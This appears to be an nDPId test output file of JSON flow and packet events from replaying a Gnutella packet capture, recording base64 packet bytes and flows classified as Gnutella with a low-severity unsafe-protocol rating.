+00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":68109,"flow_last_seen":68109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":68109,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.241.31.96","src_port":50228,"dst_port":14384,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":68109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68109,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KIlAAIAGNtsKAAIPb\/EfYMQ0ODBTVI35AAAAAIAC+vD7DAAAAgQFtAEDAwgBAQQC"} +00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":68109,"flow_last_seen":68109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":68109,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.36.249.91","src_port":50229,"dst_port":64920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":68109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68109,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0vGxAAIAGN8kKAAIPAST5W8Q1\/ZgxDGGiAAAAAIAC+vAZFAAAAgQFtAEDAwgBAQQC"} 
+00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":68110,"flow_last_seen":68110,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":68110,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.3.103.37","src_port":50230,"dst_port":17296,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":68110,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0BKBAAIAGOe0KAAIPSQNnJcQ2Q5DEXLK5AAAAAIAC+vA5CwAAAgQFtAEDAwgBAQQC"} +00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":283,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":68110,"flow_last_seen":68110,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":68110,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.68.138.207","src_port":50231,"dst_port":45079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":68110,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZZlAAIAGsggKAAIPTESKz8Q3sBfW5xLuAAAAAIAC+vAy2AAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":68170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68170,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0k7pAAIAGcS8KAAIPJOnE4sQsDuwTBJqfAAAAAIAC+vD9iAAAAgQFtAEDAwgBAQQC"} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":68368,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":68368,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAqgAAEAGVIJ08aKiCgACDz09xDIAcUgB9bSpG2AS\/\/+LwQAAAgQFtA=="} +00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":68368,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":68368,"pkt":"UlQAEjUCCAAn5uVZCABFAAAobmNAAIAGaMoKAAIPdPGiosQyPT31tKkbAHFIAlAQ+vCojQAA"} 
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":68108,"flow_last_seen":68372,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":68372,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"116.241.162.162","src_port":50226,"dst_port":15677,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":68425,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":68425,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAqoAAP8GHcZv8R9gCgACDzgwxDQAAAAAU1SN+lAUAAA2vQAA"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":68935,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68935,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KIpAAIAGNtoKAAIPb\/EfYMQ0ODBTVI35AAAAAIAC+vD7DAAAAgQFtAEDAwgBAQQC"} 
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":69076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZdpAAIAGUVsKAAIPtpuA5MQoDLg79XydAAAAAIAC+vCnHQAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":69076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0d8NAAIAGrlMKAAIPcfxWosQp1q4KULlcAAAAAIAC+vBA7QAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":69076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FThAAIAG3SkKAAIPUMGrksQm0jCYt6bIAAAAAIAC+vCV5QAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":69076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0EU9AAIAGi6AKAAIPWmf3XsQq5qXgntCpAAAAAIAC+vC6MQAAAgQFtAEDAwgBAQQC"} 
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":69076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Co1AAIAGJkcKAAIPfPRA7cQnEmB1c07JAAAAAIAC+vAPawAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":69092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69092,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gY9AAIAGBqAKAAIPwXmlDMQr2FBBRhZnAAAAAIAC+vANYQAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69141,"flow_last_seen":69141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69141,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":50232,"dst_port":15068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":69141,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69141,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0LcBAAIAGF3gKAAIPtpvy4cQ4Otw6vMh+AAAAAIAC+vC8QwAAAgQFtAEDAwgBAQQC"} 
+00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69141,"flow_last_seen":69141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69141,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.163.14.246","src_port":50233,"dst_port":12854,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":69141,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69141,"pkt":"UlQAEjUCCAAn5uVZCABFAAA01LRAAIAGCWgKAAIPAaMO9sQ5MjZr2Fv\/AAAAAIAC+vCZMAAAAgQFtAEDAwgBAQQC"} +00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69142,"flow_last_seen":69142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69142,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.189.28.17","src_port":50234,"dst_port":16269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":69142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69142,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0VPxAAIAGOusKAAIPQr0cEcQ6P42S8gLxAAAAAIAC+vBvlwAAAgQFtAEDAwgBAQQC"} +00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69142,"flow_last_seen":69142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69142,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.118.70","src_port":50235,"dst_port":6906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":69142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69142,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AgNAAIAGSRQKAAIPLVh2RsQ7GvpGaqL3AAAAAIAC+vD72gAAAgQFtAEDAwgBAQQC"} 
+00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69142,"flow_last_seen":69142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69142,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.135.209","src_port":50236,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":69142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69142,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Z6pAAIAGohwKAAIPXR2H0cQ8GMo64wwuAAAAAIAC+vBfCgAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":69142,"flow_last_seen":69142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":69142,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.123.202.175","src_port":50237,"dst_port":37910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":69142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69142,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0lydAAIAGNGMKAAIPWHvKr8Q9lBZfEvXQAAAAAIAC+vCXrgAAAgQFtAEDAwgBAQQC"} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":69169,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69169,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAq8AAEAGhyBdHYfRCgACDxjKxDwAczwBOuMML2AS\/\/9GjAAAAgQFtA=="} +00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":69169,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":69169,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoZ6tAAIAGoicKAAIPXR2H0cQ8GMo64wwvAHM8AlAQ+vBjWAAA"} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69142,"flow_last_seen":69174,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":69174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.135.209","src_port":50236,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":69182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69182,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArEAAEAGyG4tWHZGCgACDxr6xDsAdDYBRmqi+GAS\/\/\/pWwAAAgQFtA=="} +00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":69182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":69182,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoAgRAAIAGSR8KAAIPLVh2RsQ7GvpGaqL4AHQ2AlAQ+vAGKAAA"} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69142,"flow_last_seen":69182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":69182,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.118.70","src_port":50235,"dst_port":6906,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArgAAEAG3qdZSzQTCgACD7O6xBEAXroBd2GZhGAS\/\/+7lwAAAgQFtA=="} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArkAAEAG56stQVcYCgACDz9JxBAAXcABhPHErWAS\/\/\/6VgAAAgQFtA=="} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAroAAEAG+PjPJqPkCgACDxp6xA8AYK4B6qFHeGAS\/\/9Z9wAAAgQFtA=="} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArsAAEAG2+NQjD+TCgACD3NpxA4AX7QBeWsMs2AS\/\/+J8QAAAgQFtA=="} 
+00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":69360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArwAAEAGwoS2m\/LhCgACDzrcxDgAdioBOrzIf2AS\/\/+1wgAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":69360,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoLcFAAIAGF4MKAAIPtpvy4cQ4Otw6vMh\/AHYqAlAQ+vDSjgAA"} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69141,"flow_last_seen":69361,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":69361,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":50232,"dst_port":15068,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":70110,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UtFAAIAGDgYKAAIPTn0\/YcQwGMq9KdLlAAAAAIAC+vBtKAAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":70110,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0faJAAIAGiKUKAAIPO2itBcQtwyRMUgplAAAAAIAC+vChmQAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":70110,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0R01AAIAGN+QKAAIPdqf43MQv9oQzn2SqAAAAAIAC+vCljgAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":70110,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0+zdAAIAGNBgKAAIPbdJRk8QxYOCX52ZFAAAAAIAC+vCFbAAAAgQFtAEDAwgBAQQC"} 
